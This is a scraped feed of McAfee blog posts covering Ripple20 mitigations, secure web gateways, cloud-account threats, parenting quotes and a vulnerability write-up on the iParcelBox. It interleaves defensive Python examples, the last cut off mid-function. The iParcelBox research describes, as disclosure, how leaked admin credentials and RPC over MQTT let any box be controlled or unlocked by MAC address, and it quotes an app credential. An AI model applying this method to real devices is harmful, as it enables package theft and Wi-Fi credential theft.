There are potentially tens of millions of devices that are vulnerable to at least one of the Ripple20 flaws. Mitigating impact requires attention from both device owners and device vendors.

Mitigations for users of vulnerable devices per CISA recommendations (where possible): 

  • Patch any device for which a vendor has released an update.
  • Practice the principle of least privilege for all users and devices (devices and users should only have access to the set of capabilities needed to accomplish their job). In this case, minimize network exposure and internet-accessibility for all control system devices.
  • Locate control system networks and remote devices behind firewalls and isolate them from the business network.
  • When remote access is required, use secure methods, such as Virtual Private Networks (VPNs), recognizing that VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize that a VPN is only as secure as the connected devices. VPN solutions should use multi-factor authentication.
  • Use caching DNS servers in your organization, prohibiting direct DNS queries to the internet. Ideally, caching DNS servers should utilize DNS-over-HTTPS for lookups.
  • Block anomalous IP traffic by utilizing a combination of firewalls and intrusion prevention systems.
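The exposure and DNS points in the list above can be checked mechanically against network flow records. The following is an added example, not McAfee’s or CISA’s code: it takes a constructed inventory of control-system devices suspected of running the Treck stack, a constructed internal caching-resolver address, and constructed flow records, and flags three mitigation gaps: a device reachable from a public address (the highest-priority Ripple20 exposure), a device querying DNS directly rather than through the caching resolver, and a device talking to the internet at all. The device names, addresses and record format are assumptions for illustration; a real deployment would read the inventory from its asset database and the flows from its firewall or NetFlow collector.

```python
"""Audit flow records for Ripple20 mitigation gaps.

Added example (not McAfee's or CISA's code). The inventory, resolver
address and flow records below are constructed for illustration.
"""
import ipaddress
from dataclasses import dataclass

# Constructed inventory: control-system devices known or suspected to run
# the Treck stack, keyed by IP address (hypothetical names).
CONTROL_SYSTEM_DEVICES = {
    "10.20.0.11": "PLC-line-1",
    "10.20.0.12": "HMI-panel",
    "10.20.0.13": "UPS-controller",
}

# Constructed: the only resolver these devices should query directly.
CACHING_RESOLVER = ipaddress.ip_address("10.0.0.53")

# RFC 1918 ranges; any other address is treated as "the internet".
PRIVATE_NETS = [ipaddress.ip_network(n) for n in
                ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]

# Constructed sample flow records: src,sport,dst,dport,proto
SAMPLE_FLOWS = """\
# src,sport,dst,dport,proto
10.20.0.11,49152,10.0.0.53,53,udp
10.20.0.12,49153,8.8.8.8,53,udp
203.0.113.7,44321,10.20.0.13,80,tcp
10.20.0.11,49154,198.51.100.9,443,tcp
10.50.1.4,51000,10.20.0.11,502,tcp
192.168.1.5,40000,10.0.0.53,53,udp
"""


@dataclass(frozen=True)
class Finding:
    device: str   # inventory name of the affected control-system device
    rule: str     # which mitigation the flow violates
    detail: str   # human-readable evidence from the flow


def is_private(ip) -> bool:
    """True if the address is inside an RFC 1918 range."""
    return any(ip in net for net in PRIVATE_NETS)


def parse_flow(line: str) -> dict:
    """Parse one 'src,sport,dst,dport,proto' record."""
    src, sport, dst, dport, proto = (f.strip() for f in line.split(","))
    return {
        "src": ipaddress.ip_address(src), "sport": int(sport),
        "dst": ipaddress.ip_address(dst), "dport": int(dport),
        "proto": proto.lower(),
    }


def audit_flows(lines):
    """Return a list of Findings for flows that violate the mitigations."""
    findings = []
    for line in lines:
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        flow = parse_flow(line)
        src, dst = str(flow["src"]), str(flow["dst"])

        # Inbound from a public address: the stack is internet-exposed.
        if dst in CONTROL_SYSTEM_DEVICES and not is_private(flow["src"]):
            findings.append(Finding(
                CONTROL_SYSTEM_DEVICES[dst], "internet-exposed",
                f"inbound from {src} to port {flow['dport']}/{flow['proto']}"))

        if src in CONTROL_SYSTEM_DEVICES:
            name = CONTROL_SYSTEM_DEVICES[src]
            # DNS that does not go to the caching resolver bypasses the
            # "no direct DNS queries to the internet" mitigation.
            if flow["dport"] == 53 and flow["dst"] != CACHING_RESOLVER:
                findings.append(Finding(
                    name, "direct-dns",
                    f"DNS query to {dst} bypasses caching resolver"))
            # Any other public destination means the device is not
            # isolated from the internet as recommended.
            elif not is_private(flow["dst"]):
                findings.append(Finding(
                    name, "outbound-internet",
                    f"to {dst}:{flow['dport']}/{flow['proto']}"))
    return findings


if __name__ == "__main__":
    for f in audit_flows(SAMPLE_FLOWS.splitlines()):
        print(f"{f.device:15} {f.rule:18} {f.detail}")
```

Each finding maps to one of the CISA recommendations: an `internet-exposed` device needs to be moved behind the firewall or patched first, `direct-dns` means the device (or its DHCP-supplied resolver) is not pointed at the caching resolver, and `outbound-internet` indicates the control-system segment is not isolated from the business network and the internet.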

Where Can I Go to Get More Information?

Please review KB93020 for more information and subscribe for updates.

What to Expect from the Next Generation of Secure Web Gateways https://www.mcafee.com/blogs/enterprise/cloud-security/what-to-expect-from-the-next-generation-of-secure-web-gateways/ https://www.mcafee.com/blogs/enterprise/cloud-security/what-to-expect-from-the-next-generation-of-secure-web-gateways/#respond Mon, 22 Jun 2020 19:42:27 +0000 /blogs/?p=102097

After more than a century of technological innovation since the first units rolled off Henry Ford’s assembly lines, automobiles and transportation bear little in common with the Model T era. This evolution will continue as society finds better ways to achieve the outcome of moving people from point A to point B.

While secure web gateways (SWGs) have operated on a far more compressed timetable, a similarly drastic evolution has taken place. SWGs are still largely focused on ensuring users are protected from unsafe or non-compliant corners of the internet, but the transition to a cloud- and remote-working world has created new security challenges that the traditional SWG is no longer equipped to handle. It’s time for the next generation of SWGs that can empower users to thrive safely in an increasingly decentralized and dangerous world.

How We Got Here

The SWG actually started out as a URL filtering solution and enabled organizations to ensure that employees’ web browsing complied with corporate internet access policy.

URL filtering then transitioned to proxy servers sitting behind corporate firewalls. Since proxies terminate traffic coming from users and complete the connection to the desired websites, security experts quickly saw the potential to perform more thorough inspection than just comparing URLs to existing blacklists. By incorporating anti-virus and other security capabilities, the “secure web gateway” became a critical part of modern security architectures. However, the traditional SWG could only play this role if it was the chokepoint for all internet traffic, sitting at the edge of every corporate network perimeter and having remote users “hairpin” back through that network via VPN or MPLS links.

Next-Generation SWG

The transition to a cloud and remote-working world has put new burdens on the traditional perimeter-based SWG. Users can now directly access IT infrastructure and connected resources from virtually any location from a variety of different devices, and many of those resources no longer reside within the network perimeter on corporate servers.

This remarkable transformation also expands the requirements for data and threat protection, leaving security teams to grapple with a number of new sophisticated threats and compliance challenges. Unfortunately, traditional SWGs haven’t been able to keep pace with this evolving threat landscape.

Just about every major breach now involves sophisticated multi-level web components that can’t be stopped by a static engine. The traditional SWG approach has been to coordinate with other parts of the security infrastructure, including malware sandboxes. But as threats have become more advanced and complex, doing this has resulted in slowing down performance or letting threats get through. This is where Remote Browser Isolation (RBI) brings in a paradigm shift to advanced threat protection. When RBI is implemented as an integral component of SWG traffic inspection, and with the right technology like pixel mapping, it can deliver real-time, zero-day protection against ransomware, phishing attacks and other advanced malware while not hindering the browsing experience.

Another issue revolves around the encrypted nature of the internet. The majority of web traffic and virtually all cloud applications use SSL or TLS to protect communications and data. Without the ability to decrypt, inspect and re-encrypt traffic in a compliant, privacy-preserving manner, a traditional SWG is simply not able to cope with today’s world.

Finally, there is the question of cloud applications. While cloud applications operate on the same internet as traditional websites, they function in a fundamentally different way that traditional SWGs simply can’t understand. Cloud Access Security Brokers (CASBs) are designed to provide visibility and control over cloud applications, and if the SWG doesn’t have access to a comprehensive CASB application database and sophisticated CASB controls, it is effectively blind to the cloud.

 

What we need from Next-Gen SWGs

Fig. Next Generation Secure Web Gateway Capabilities

A next-gen SWG should help simplify the implementation of Secure Access Service Edge (SASE) architecture and help accelerate secure cloud adoption. At the same time, it needs to provide advanced threat protection, unified data control, and efficiently enable a remote and distributed workforce.

Here are some of the use cases:

  • Enable a remote workforce with a direct-to-cloud architecture that delivers 99.999% availability – As countries and states slowly came out of shelter-in-place orders, many organizations indicated that supporting a remote and distributed workforce will likely be the new norm. Keeping remote workers productive, data secured, and endpoints protected can be overwhelming at times. A next-gen SWG should provide organizations with the scalability and security to support today’s remote workforce and distributed digital ecosystem. A cloud-native architecture helps ensure availability, lower latency, and maintain user productivity wherever your team is working. A true cloud-grade service should offer five nines (99.999%) availability consistently.

 

  • Reduce administrative complexity and lower cost – Today, with increased cloud adoption, more than eighty percent of traffic is destined for the internet. Backhauling internet traffic through a traditional “hub and spoke” architecture, which requires expensive MPLS links, can be very costly. Networks slow to a halt as traffic spikes, and VPNs for remote workers have proven to be ineffective. A next-gen SWG should support the SASE framework and provide a direct-to-cloud architecture that lowers the total operating cost by reducing the need for MPLS links. With a SaaS delivery model, next-gen SWGs remove the need to deploy and maintain hardware infrastructure, reducing hardware and operating costs. Per Gartner’s SASE report, organizations can “reduce complexity now on the network security side by moving to ideally one vendor for secure web gateway (SWG), cloud access security broker (CASB)…” By unifying CASB and SWG, organizations benefit from unified policy and incident management, shared insight into business risk and a shared threat database, and reduced administrative complexity.

 

  • Defend against known and unknown threats – As the web continues to grow and evolve, web-borne malware attacks grow and evolve as well. Ransomware, phishing and other advanced web-based threats are putting users and endpoints at risk. A next-gen SWG should provide real-time zero-day malware and advanced phishing protection via a layered approach that integrates dynamic threat intelligence for URLs, IPs and file hashes with real-time protection against unknown threats using machine learning and emulation-based sandboxing. A next-gen SWG should also include integrated Remote Browser Isolation to prevent unknown threats from ever reaching the endpoints. Furthermore, a next-gen SWG should provide the capability to decrypt, inspect and re-encrypt SSL/TLS traffic so threats and sensitive data cannot hide in encrypted traffic. Lastly, a next-gen SWG should be XDR-integrated to improve SOC efficiency. SOC teams have too much to deal with already, and they shouldn’t settle for siloed security tools.

 

  • Lock down your data, not your business – More than 95% of companies today use cloud services, yet only 36% of companies can enforce data loss prevention (DLP) rules in the cloud at all. A next-gen SWG should offer a more effective way to enforce protection with built-in DLP templates and in-line data protection workflows to help organizations comply with regulations. Device-to-cloud data protection offers comprehensive data visibility and consistent controls across endpoints, users, clouds, and networks. When incidents do happen, administrators should be able to manage investigations, workflows, and reporting from a single console. Next-gen SWGs should also integrate user and entity behavior analytics (UEBA) to further protect business-sensitive data by distinguishing normal users from malicious or compromised ones.

SWGs have clearly come a long way from just being URL filtering devices to the point where they are essential to furthering the safe and accelerated adoption of the cloud. But we need to push the proverbial envelope a lot further. Digital transformation demands nothing less.

Live Webinar

Top Use Cases for a Next-Gen Secure Web Gateway

Thursday, July 16, 2020
10am PT | 12pm CT | 1pm ET

Working from Home in 2020: Threat Actors Target the Cloud https://www.mcafee.com/blogs/enterprise/cloud-security/working-from-home-in-2020-threat-actors-target-the-cloud/ https://www.mcafee.com/blogs/enterprise/cloud-security/working-from-home-in-2020-threat-actors-target-the-cloud/#comments Mon, 22 Jun 2020 15:00:19 +0000 /blogs/?p=101994

Like any enterprise, cybercrime focuses its resources where it can derive value, which is data. In the case of ransomware, data is held hostage for a direct monetary exchange, whereas many other data breaches seek to steal data and monetize it on dark web markets. These two methods are even starting to merge, with some cybercrime organizations now offering Data-Leaking-as-a-Service. For most of the history of cybercrime, resources and infrastructure used to steal data targeted endpoint devices and network stores, using malware to land an attack, find data, and exfiltrate. That’s where the data was.   

Now, we have a dramatic shift of data moving to cloud service providers, held not within the confines of a customer’s managed network but instead a third party. The shift to working from home in early 2020 accelerated cloud use, just as it accelerated other trends like food delivery and telehealth. Read more about the increase in cloud use in our first post on this topic, here.  

With the acceleration of cloud adoption comes more data in the cloud and, in lockstep, threat actors shifting their attack resources to the cloud. Through the first months of 2020, as this shift occurred, we monitored attack attempts from external threat actors on our customers’ cloud accounts, which increased 630%:

  

In this chart, we’ve plotted all threats across 30 million cloud end users, along with the two primary categories of external threat events targeted at cloud accounts. They are: 

  • Excessive Usage from Anomalous Location. This begins with a login from a location that has not been previously detected and is anomalous to the user’s organization. The threat actor then initiates high-volume data access and/or privileged access activity.  
  • Suspicious Superhuman. This is a login attempt from more than one geographically distant location, impossible to travel to within a given period of time. We track this across multiple cloud services, for example, if a user attempts to log into Microsoft 365 in Singapore, then logs into Slack in California five minutes later.  
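
The two categories above can be expressed as detection rules. The following is an added example (not McAfee's detection code) that runs both over a small set of constructed login and activity events: "Suspicious Superhuman" compares consecutive logins by the same user across any services and flags an implied travel speed no airliner could reach; "Excessive Usage from Anomalous Location" flags a login from a location the organization has never seen when it is followed by a burst of downloads or privileged actions. The event schema, the speed and volume thresholds, and the known-location baseline are assumptions.

```python
"""Detection logic for the two cloud-account threat categories, run over a constructed
sample of login/activity events. Added example; the event schema, thresholds and sample
values are assumptions, not McAfee telemetry."""
from datetime import datetime, timedelta
from math import asin, cos, radians, sin, sqrt
from typing import Dict, List, Set

# Constructed sample telemetry (not real data). One dict per event.
EVENTS: List[Dict] = [
    # alice: Microsoft 365 login in Singapore, then Slack login in California 5 minutes later
    {"ts": "2020-03-02T09:00:00", "user": "alice", "service": "Microsoft 365",
     "action": "login", "city": "Singapore", "lat": 1.35, "lon": 103.82},
    {"ts": "2020-03-02T09:05:00", "user": "alice", "service": "Slack",
     "action": "login", "city": "San Jose", "lat": 37.34, "lon": -121.89},
    # bob: login from a city the organisation has never seen, followed by a download burst
    {"ts": "2020-03-02T10:00:00", "user": "bob", "service": "Box",
     "action": "login", "city": "Lagos", "lat": 6.52, "lon": 3.38},
    *[{"ts": f"2020-03-02T10:{m:02d}:00", "user": "bob", "service": "Box",
       "action": "download", "city": "Lagos", "lat": 6.52, "lon": 3.38} for m in range(1, 13)],
    # carol: a drive-sized move two hours apart; must not be flagged
    {"ts": "2020-03-02T08:00:00", "user": "carol", "service": "Microsoft 365",
     "action": "login", "city": "Austin", "lat": 30.27, "lon": -97.74},
    {"ts": "2020-03-02T10:00:00", "user": "carol", "service": "Slack",
     "action": "login", "city": "Dallas", "lat": 32.78, "lon": -96.80},
]

# Locations previously seen for this organisation (constructed baseline).
KNOWN_CITIES: Set[str] = {"Singapore", "San Jose", "Austin", "Dallas"}


def haversine_km(lat1: float, lon1: float, lat2: float, lon2: float) -> float:
    """Great-circle distance between two points, in kilometres."""
    p1, p2 = radians(lat1), radians(lat2)
    a = sin((p2 - p1) / 2) ** 2 + cos(p1) * cos(p2) * sin(radians(lon2 - lon1) / 2) ** 2
    return 2 * 6371.0 * asin(sqrt(a))


def _when(e: Dict) -> datetime:
    return datetime.fromisoformat(e["ts"])


def detect_superhuman(events: List[Dict], max_speed_kmh: float = 900.0,
                      min_distance_km: float = 50.0) -> List[Dict]:
    """'Suspicious Superhuman': consecutive logins by one user, across any services, whose
    implied travel speed exceeds what an airliner could manage."""
    alerts = []
    by_user: Dict[str, List[Dict]] = {}
    for e in sorted((e for e in events if e["action"] == "login"), key=_when):
        by_user.setdefault(e["user"], []).append(e)
    for user, logins in by_user.items():
        for prev, cur in zip(logins, logins[1:]):
            km = haversine_km(prev["lat"], prev["lon"], cur["lat"], cur["lon"])
            hours = (_when(cur) - _when(prev)).total_seconds() / 3600.0
            # Two distant logins at the same instant are impossible too; avoid dividing by zero.
            if km >= min_distance_km and (hours == 0 or km / hours > max_speed_kmh):
                alerts.append({"user": user, "km": round(km), "minutes": round(hours * 60),
                               "from": f'{prev["city"]} ({prev["service"]})',
                               "to": f'{cur["city"]} ({cur["service"]})'})
    return alerts


def detect_anomalous_excessive_usage(events: List[Dict], known_cities: Set[str],
                                     window: timedelta = timedelta(minutes=30),
                                     volume_threshold: int = 10) -> List[Dict]:
    """'Excessive Usage from Anomalous Location': a login from a never-seen location
    followed, within the window, by high-volume data access or privileged activity."""
    alerts = []
    for login in (e for e in events if e["action"] == "login" and e["city"] not in known_cities):
        start = _when(login)
        follow = [e for e in events if e["user"] == login["user"] and e["action"] != "login"
                  and start <= _when(e) <= start + window]
        downloads = sum(1 for e in follow if e["action"] == "download")
        privileged = sum(1 for e in follow if e["action"] in {"role_change", "grant_admin"})
        if downloads >= volume_threshold or privileged:
            alerts.append({"user": login["user"], "city": login["city"],
                           "service": login["service"], "downloads": downloads,
                           "privileged_actions": privileged})
    return alerts


if __name__ == "__main__":
    for a in detect_superhuman(EVENTS) + detect_anomalous_excessive_usage(EVENTS, KNOWN_CITIES):
        print(a)
```

Running it flags alice (Singapore to San Jose in five minutes, roughly 13,600 km, across two different services) and bob (first-ever login from Lagos followed by twelve downloads in twelve minutes), while carol's two-hour Austin-to-Dallas move passes. The speed threshold is what separates legitimate air travel from the impossible; lowering it to 100 km/h would also flag carol, which is why it needs tuning against the organization's real mobility rather than a fixed value.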

The increase in threat events impacted some verticals more than others, with companies in Transportation/Logistics, Education, and Government agencies hit the hardest:  

 

Head over to the report below for more analysis on how specific verticals were targeted, where these attacks came from, and recommendations for how to protect your organization.  

 

25 Amazing Quotes To Inspire You This Fathers Day https://www.mcafee.com/blogs/consumer/family-safety/25-amazing-quotes-inspire-recharge-parenting/ https://www.mcafee.com/blogs/consumer/family-safety/25-amazing-quotes-inspire-recharge-parenting/#comments Sat, 20 Jun 2020 13:01:49 +0000 http://blogs.mcafee.com/?p=36204

Today’s blog post is going to take a little detour off the main road. We’re going to pause from gulping down information and slaying cyber dragons and simply refuel our parenting tanks. So often the best wisdom comes from lands far beyond our well-traveled parenting peripheral. The best ideas and most brilliant connections often sneak up on us to challenge our thinking and our parenting norms, which can be a very, very good thing.

So here are some great (and hopefully new) thoughts on parenting to inject some fresh vision and levity into your perspective. If you’re anything like this parent, you much prefer a good cup of coffee, a quiet house, and a double dose of higher thinking over just about any life perk. Oh, and if you need a great laugh, listen to Author Andy Andrews’ 50 Famous Parental Sayings in this video!

25 Amazing Parenting Quotes:

  1. “Hugs can do great amounts of good, especially for children.” – Princess Diana
  2. “Trust yourself. You know more than you think you do.” – Dr. Benjamin Spock
  3. “Even in our increasingly toxic culture, parents can still have the inside track in their children’s development because parents are their children’s first and most important moral teachers.” – Dr. Michele Borba
  4. “The most beautiful sight in the world is a little child going confidently down the road of life after you have shown him the way.” – Confucius
  5. “I’ve learned that you can tell a lot about a person by the way he or she handles these three things: a rainy day, lost luggage, and tangled Christmas tree lights.” – Maya Angelou
  6. “What it’s like to be a parent: It’s one of the hardest things you’ll ever do but in exchange it teaches you the meaning of unconditional love.” – Nicholas Sparks
  7. “To be in your children’s memories tomorrow, you have to be in their lives today.” – Barbara Johnson
  8. “Children have never been very good at listening to their elders, but they have never failed to imitate them.” – James Baldwin
  9. “Don’t let the sun go down without saying thank you to someone, and without admitting to yourself that absolutely no one gets this far alone.” – Stephen King
  10. “Work at our responsibility as parents as if everything in life counted on it.” – Gordon B. Hinckley
  11. “But let me tell you something, ladies. There will come a day when you look back on these [toddler] years with something that feels like wistfulness. A longing even. Because that pea-soup-spewing, head spinning, chicken-nugget-clutching abomination in the car seat behind you is going to be a teenager some day. And then things get really fun.” – Jennifer Ball, blogger
  12. “Vulnerability sounds like truth and feels like courage. Truth and courage aren’t always comfortable, but they’re never weakness.” – Brené Brown
  13. “Sometimes we’re so concerned about giving our children what we never had growing up, we neglect to give them what we did have growing up.” – Dr. James Dobson
  14. “Live life in such a way that when your children think of fairness and integrity, they think of you.” – H. Jackson Brown, Jr.
  15. “If you are a parent, open doors to unknown directions to the child so he can explore. Don’t make him afraid of the unknown, give him support.” – Osho
  16. “When you’re feeling insecure and just plain not-good-enough as a parent, remember most parents feel the same way.” – Anon.
  17. “The way we talk to our children becomes their inner voice.” – Peggy O’Mara
  18. “Always kiss your children good night even if they’re already asleep.” – H. Jackson Brown, Jr.
  19. “Never let the things you want make you forget the things you have.” – Anon.
  20. “Children need love the most when they least deserve it.” – Harold Hulbert
  21. “A father’s words are like a thermostat that sets the temperature in the house.” – Paul Lewis
  22. “Children spell ‘love’ . . . T-I-M-E.” – Dr. A. Witham
  23. “The school will teach children how to read, but the environment of the home must teach them what to read. The school can teach them how to think, but the home must teach them what to believe.” – Charles A. Wells
  24. “Don’t feel entitled to anything you didn’t sweat and struggle for.” – Marian Wright Edelman
  25. “If you want your children to improve, let them overhear the nice things you say about them to others.” – Haim Ginott


Toni Birdsong is a Family Safety Evangelist to McAfee. You can find her on Twitter @SafeEyes

ST20: Quantum Computing with Steve Grobman & Jon King https://www.mcafee.com/blogs/other-blogs/podcast/st20-quantum-computing-with-steve-grobman-jon-king/ https://www.mcafee.com/blogs/other-blogs/podcast/st20-quantum-computing-with-steve-grobman-jon-king/#respond Thu, 18 Jun 2020 17:41:05 +0000 /blogs/?p=101991

McAfee’s Chief Technology Officer Steve Grobman and Fellow Jon King discuss quantum computing and potential impacts to security as this technology continues to develop.

My Adventures Hacking the iParcelBox https://www.mcafee.com/blogs/other-blogs/mcafee-labs/my-adventures-hacking-the-iparcelbox/ https://www.mcafee.com/blogs/other-blogs/mcafee-labs/my-adventures-hacking-the-iparcelbox/#respond Thu, 18 Jun 2020 07:01:48 +0000 /blogs/?p=101923

In 2019, McAfee Advanced Threat Research (ATR) disclosed a vulnerability in a product called BoxLock. Sometime after this, the CEO of iParcelBox, a U.K. company, reached out to us and offered to send a few of their products to test. While this isn’t the typical M.O. for our research we applaud the company for being proactive in their security efforts and so, as the team over at iParcelBox were kind enough to get everything shipped over to us, we decided to take a look.

The iParcelBox is a large steel box that package couriers, neighbors, etc. can access to retrieve or deliver items securely without needing to enter your home. The iParcelBox has a single button on it that when pushed will notify the owner that someone wants to place an object inside. The owner will get an “open” request push notification on their mobile device, which they can either accept or deny.

The iParcelBox (Photo Credit: iparcelbox.com)

Recon

The first thing we noticed about this device is the simplicity of it. In the mindset of an attacker, we are always looking at a wide variety of attack vectors. This device only has three external vectors: remote cloud APIs, WIFI, and a single physical button.

iParcelBox Delivery Button (Photo Credit: iparcelbox.com)

During setup the iParcelBox creates a WIFI access point for the mobile application to connect with and send setup information. Each iParcelBox has a unique, randomly generated 16-character WiFi password that puts brute forcing the WPA2 key out of the question; additionally, this access point is only available when the iParcelBox is in setup mode. The iParcelBox can be placed into setup mode by holding the button down, but doing so warns the owner via a notification, and the device only remains in setup mode for a few minutes before returning to normal operation.

iParcelBox Random WiFi Access Point Password (16 Characters)

Since we have the WiFi password for the iParcelBox in our lab, we connected to the device to see what we could glean from the webserver. The device was only listening on port 443, meaning that the traffic between the application and iParcelBox was most likely encrypted, which we later verified. This pointed us to the Android app to try to decipher what type of messages were being sent to the iParcelBox during setup.

iParcelBox Port Scan

Using dex2jar we were able to disassemble the APK file and look at the code within the app. We noticed quickly that the iParcelBox was using MQTT (MQ Telemetry Transport) for passing messages back and forth between the iParcelBox and the cloud. MQTT is a publish/subscribe message protocol where devices can subscribe to “topics” and receive messages. A simple description can be found here: (https://youtu.be/EIxdz-2rhLs)

Dex2Jar Command

A typical next step is to retrieve the firmware for the device, so we started to look through the disassembled APK code for interesting URLs. While we didn’t find any direct firmware links, we were able to find some useful information.

Disassembled Code pulled from APK

The code snippet above shows a few interesting points, including the string “config.iparcelbox.com” as well as the line with “app” and “TBpwkjoU68M”. We thought that these could be credentials for an app user passed to the iParcelBox during setup; we’ll come back to this later. The URL didn’t resolve on the internet, but when connecting to the iParcelBox access point and doing a dig query we were able to see that it resolves to the iParcelBox.

DNS Lookup of config.iparcelbox.com

Nothing from the Android app or the webserver on the device popped out to us so we decided to look deeper. One of the most common ways that information about targets can be gathered is by looking through user forums and seeing if there are others trying to tweak and modify the device. Often with IOT devices, home automation forums have numerous examples of API usage as well as user scripts to interact with such devices. We wanted to see if there was anything like this for the iParcelBox. Our initial search for iParcelBox came up empty, other than some marketing content, but when the search was changed to iParcelBox API, we noticed a few interesting posts.

Google Search for “iparcelbox api”

We could see that even on the first page there are a few bug reports and a couple of user forums for “Mongoose-OS”. After going to the Mongoose-OS forums we could clearly see that one user was a part of the iParcelBox development team. This gave us some insight that the device was running Mongoose-OS on an ESP32 Development board, which is important since an ESP32 device can be flashed with many other types of code. We started to track the user’s posts and were able to discover extensive information about the device and the development decisions throughout the building process. Most importantly this served as a shortcut to many of the remaining analysis techniques.

As mentioned earlier, a high priority is to try to gain access to the device’s firmware by either pulling it from the device directly or by downloading it from the vendor’s site. Pulling firmware is slightly more tedious since you must often solder wires to the flash chip or remove the chip altogether to interface with the flash. Before we began to attempt to pull the firmware from the ESP32, we noticed another post within the forums that mentioned that the flash memory on the device was encrypted.

Post describing flash encryption

With this knowledge, we skipped soldering wires to the ESP32 and didn’t even try to pull the firmware manually since it would have proven difficult to get anything off it. This also gave us insight into the provisioning process and how each device is set up. With this knowledge we started to look for how the OTA updates are downloaded.

Searching around a little longer we were able to find a file upload of a large log file containing what seemed like the iParcelBox boot procedure. Searching through the log we found some highly sensitive data.

Admin Credentials and gh-token from boot log

In the snippet above you can see that the admin credentials are passed, as well as the GitHub token. Needless to say, this isn’t good practice; we will see if we can use that later. In this log we also found a firmware URL.

Firmware URL from boot log

However, the URL required a username and password.

Firmware.iparcelbox.com .htaccess

We found this forum post where “.htaccess” is set up to prevent unintended access to the firmware download.

.htaccess post

The admin password found earlier didn’t authenticate, so we wanted to get the logs off the device to see if these were old credentials and if we could print the new credentials out to UART.

The internals of the iParcelBox (TX and RX highlighted in red)

The ESP32 RX and TX pins are mapped to the USB-C connection, but if you look at the circuit there is no FTDI (Future Technology Devices International) chip to do processing, so this is just raw serial. We decided to just solder to the vias (Vertical Interconnect Access) highlighted in red above, but still no data was transferred.

Then we started to search those overly helpful forum postings again, and quickly found the reason.

Disable UART

This at least verified that it wasn’t something that we set up incorrectly, but rather that logging was simply disabled over UART.

Method #1 – RPC

From our recon work we pretty much settled on the fact that we were not going to get into the iParcelBox easily from a physical standpoint and decided to switch to a network approach. We knew that during setup the iParcelBox creates a wireless AP and that we can connect to it. Armed with our knowledge from the forums we decided to revisit the web server on the iParcelBox. We began by sending some “MOS” (Mongoose-OS) control commands to see what stuck.

Setup instructions for Mongoose-OS can be found here. Instead of installing directly to the OS we did it in Docker for portability.

Docker file used to create mos

Referencing the forums provided several examples of how to use the mos command.

Docker mos commands

The first command returned a promising message that we just need to supply credentials. Remember when we found the boot log earlier? Yep, the admin credentials were posted online, and they actually work!

At this point we had full effective root access to the iParcelBox including access to all the files, JavaScript code, and even more importantly, the AWS certificate and private key.

With the files extracted from the device we noticed that the developers at iParcelBox implemented an Access Control List (ACL). For an IOT device this is uncommon but a good practice.

ACL showing users permissions

The credentials we found earlier in the disassembled Android APK with the username “app” were RPC credentials but with limited permissions to only run Sys.GetInfo, Wifi.Scan, Wifi.PortalSave and Sys.Reboot. Nothing too interesting can be done with those credentials, so for the rest of this method we will stick with the “admin” credentials.

Now that we have the credentials, certificates, and private keys we wanted to try to pivot to other devices. During setup we noticed that the MAC address was labeled “TopicID.”

Setup process linking MAC Address to the TopicID

As we determined earlier, the iParcelBox uses MQTT for brokering the communication between the device, cloud, and mobile application. We were interested to find out if there were any authentication barriers in place, or if all you need is the MAC address of the device to initiate commands remotely.

Since we essentially had root access, enabling logging was a logical next step so we could see what was happening on the device. From one of the Mongoose-OS forums posts we saw that you can enable UDP logging to a local device by changing the configuration on the iParcelBox.

How to enable UDP logging post

We provisioned the iParcelBox, then held the button down until we entered setup mode (where the AP was available), thus reenabling RPC calls. Then we set the “udp_log_addr” to our local machine.

Reenabling Logging on iParcelBox

Now we have logs and much more information. We wanted to test if we could access the MQTT broker and modify other iParcelBoxes. In the logs we were able to validate that the MQTT broker was set up on AWS IOT and was using the certificate and keys that we pulled earlier. We found some Python examples of connecting to the AWS MQTT broker (https://github.com/aws/aws-iot-device-sdk-python), but they assume you know the full topic path (e.g. topic_id/command/unlock).

UDP Log file

Parsing through the extracted logs from UDP, we were able to find the format for the “shadow/update” MQTT topic. However, when trying to subscribe to it with the Python script, it seemed to connect to the MQTT broker, but we couldn’t ever get any messages to send or receive. Our best guess is that it was limited to one subscribe per topic or that our code was broken.

We went searching for another way to control devices. This brought us back to the Mongoose-OS forum (seeing a pattern here?). We found this post explaining that the devices can run RPC commands over MQTT.

RPC over MQTT

This would be better for an attacker than only MQTT access, since this gives full access to the device including certificates, keys, user configuration files, WIFI passwords, and more. We could also use RPC to write custom code or custom firmware at this point.  We found the official Mongoose-OS support for this here (https://github.com/mongoose-os-libs/rpc-mqtt), to which they even included an example with AWS IOT.

After plugging that into the “mos” command we were able to run all administrative RPC commands on the device that we pulled the keys from, but also any other device that we knew the MAC address of.

Running RPC commands on multiple ATR lab devices

Looking at the two iParcelBoxes that were sent to us, the MAC addresses are only slightly different, which strongly suggests that they are generated incrementally.

  • 30AEA4C59D30
  • 30AEA4C59D6C

Theoretically, with the MAC addresses incremental we could have just written a simple script to iterate through each of the iParcelBoxes’ MAC addresses, found any iParcelBox connected to the internet, and controlled or modified them in any way we wanted. However, the most common attack would likely be a more targeted one, where the attacker was looking to steal a package or even a victim’s home WiFi credentials. An attacker could do a simple network scan to find the MAC address of the target iParcelbox using a tool like “airodump-ng”. Then, after the attacker knows the target MAC address, they could use the admin credentials to initiate a “mos” command over MQTT and execute a “GPIO.Toggle” command directed at the GPIO (General Purpose Input Output) pin that controls the locking mechanism on the iParcelBox. A toggle will invert the state, so if the iParcelBox is locked, a GPIO toggle will unlock the box. If the attacker had other motives, they could also initiate a config dump to gain access to the WiFi credentials to which the iParcelBox is connected.
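
The root cause in this method is that the keys and admin credentials recovered from one device are honoured by the broker for every device's topics, so knowing a neighbour's topic ID (its MAC address) is enough to address it. The fix is broker-side authorization that derives each client's permitted topics from the identity it authenticated with, rather than from anything the client names. The following is an added example (not iParcelBox or Mongoose-OS code) of such a policy check: it implements MQTT topic-filter matching, a per-device principal confined to its own topic subtree, and a separate backend role that is the only identity allowed to address every device. The topic layout `<topic_id>/command/...` and `.../shadow/update` follows the examples on this page; the `rpc/request` and `rpc/response` names and the backend role are assumptions.

```python
"""Broker-side MQTT topic authorization that binds each device identity to its own topic
subtree. Added example, not iParcelBox or Mongoose-OS code. Topic layout follows the page's
examples (<topic_id>/command/..., .../shadow/update); the rpc/request and rpc/response
names and the backend role are assumptions."""
from dataclasses import dataclass
from typing import List


def topic_matches(filter_: str, topic: str) -> bool:
    """MQTT topic-filter matching: '+' matches exactly one level, '#' (last level only)
    matches the remainder, including zero levels."""
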